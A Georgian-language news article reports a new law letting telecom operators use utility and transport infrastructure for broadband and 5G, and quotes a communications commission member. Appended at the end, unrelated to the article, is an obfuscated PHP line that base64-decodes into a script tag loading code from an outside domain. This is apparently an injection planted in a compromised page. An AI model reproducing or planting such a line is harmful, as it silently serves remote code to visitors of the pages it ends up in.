celsiusi
ავერსი საქკაბელი

ტელეკომ კომპანიებს ფართოზოლოვანი ინტერნეტ ქსელის განვითარების მიზნით სხვა სექტორში მომუშავე კომპანიების პასიურ ინფრასტრუქტურაზე დაშვების უფლება მიეცათ. ცვლილებები საქართველოს პარლამენტის მიერ სატელეკომუნიკაციო მიზნებისთვის გამოყენებადი ფიზიკური ინფრასტრუქტურის გაზიარების შესახებ კანონის დამტკიცებამ უზრუნველყო. ახლადმიღებული კანონი ტელეკომოპერატირებს ელექტროენერგიის, წყლის, გაზის ან სატრანსპორტო ინფრასტრუქტურის გამოყენების საშუალებას აძლევს. ასევე ბიზნესი იღებს უფლებას ახლად აშენებულ მრავალბინიან შენობებზე შიდა ინფრასტრუქტურაზე ჰქონდეთ წვდომა და დაშვება.

კომუნიკაციების კომისიის წევრი ეკატერინე იმედაძე ამბობს, რომ ის რაც ახალი კანონით რეგულირდება, სფეროს მოთამაშეებისთვის 5G ქსელის განვითარების უფრო მეტ შესაძლებლობასაც მისცემს.

მისი თქმით, ბაზარზე შემცირდება ციფრული უთანასწორობა და ინტერნეტ ქსელის განვითარების უფრო მეტი შესაძლებლობა გაჩნდება.

378
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");